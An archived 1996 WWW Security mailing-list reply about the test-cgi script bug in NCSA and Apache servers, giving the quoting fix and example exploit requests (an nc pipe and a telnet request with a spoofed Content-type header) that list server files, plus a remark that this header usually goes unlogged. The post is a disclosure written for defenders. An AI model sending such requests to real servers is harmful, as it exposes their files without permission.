[3569] in WWW Security List Archive
Re: test-cgi
daemon@ATHENA.MIT.EDU (htorgema@novice.uwaterloo.ca)
Sun Nov 17 11:47:12 1996
From: htorgema@novice.uwaterloo.ca
Date: Sun, 17 Nov 1996 08:58:56 -0500 (EST)
To: "John Q. Public" <scwild@ix.netcom.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <328E0272.6ABF@ix.netcom.com>
Errors-To: owner-www-security@ns2.rutgers.edu
On Sat, 16 Nov 1996, John Q. Public warned:
> >>> The following text is available on many sites on the net.
>
> The quick fix is to place loose quotes around all of the
> variables in the test-cgi file (they should have been there
> from the beginning!).
>
> echo QUERY_STRING = "$QUERY_STRING"
>
> This incorrect file has been seen in at least several versions
> of NCSA, and Apache.
Some versions of NCSA and Apache have corrected the QUERY_STRING line, but
not the CONTENT_TYPE nor the CONTENT_LENGTH line, while these datas can be
easily spoofed ( see example below ).
In fact, the CONTENT_TYPE line is potentially more 'dangerous' than the
QUERY_STRING line because usually, http deamons don't log this field.
> Example exploit:
>
> machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
or:
machine% telnet www.host.com 80
GET /cgi-bin/test-cgi HTTP/1.0
Content-type: /*
<Cgi output displayed here>
---------------
Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
Never let your sense of morals prevent you from doing what is right.
-- Salvor Hardin, "Foundation"
